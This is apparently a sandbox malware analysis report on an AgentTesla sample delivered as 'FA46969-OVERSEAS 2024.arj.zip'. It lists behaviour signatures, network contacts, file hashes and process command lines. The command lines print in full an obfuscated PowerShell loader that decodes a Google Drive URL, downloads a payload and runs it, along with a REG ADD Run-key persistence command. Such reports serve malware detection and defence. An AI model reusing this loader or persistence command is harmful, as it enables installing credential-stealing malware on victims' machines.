Analysis Overview
SHA256
2fdc62f0c245dab001e0b35dbbddcfc1cd9d8eedb95a22149914a4a4a646f495
Threat Level: Known bad
The file FA46969-OVERSEAS 2024.arj.zip was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-19 09:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 09:26
Reported
2024-06-19 09:28
Platform
win7-20240221-en
Max time kernel
144s
Max time network
150s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 280 set thread context of 2640 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FA46969-OVERSEAS 2024.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Delngler" /t REG_EXPAND_SZ /d "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\litteratursociologi\').Hirstie;%Grusvejene% ($erasement)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | 2bd7c1371c49d68c2b728504ab05164a |
| SHA1 | a84bafcbdfc199e935993226fee2742eb64594e1 |
| SHA256 | ea804d656a53c43500cd798626352e42f3bc306a6044dd9b920749a8cc7a84c0 |
| SHA512 | 42a8ea0e7835a963f47e2635c74660bf810abf51d91c00932250d915325bb16aee8e285f84b6e6a52a0dc3a46d2bb40d630e0f37364b5b50d29177e1710e2e6e |
C:\Users\Admin\AppData\Local\Temp\Fordelingstallet.txt
| MD5 | 771c211d0bb2a8a99f439a532b738bcd |
| SHA1 | 79aed0aab19b24700ae8ad7ac4d7b13f0f99edad |
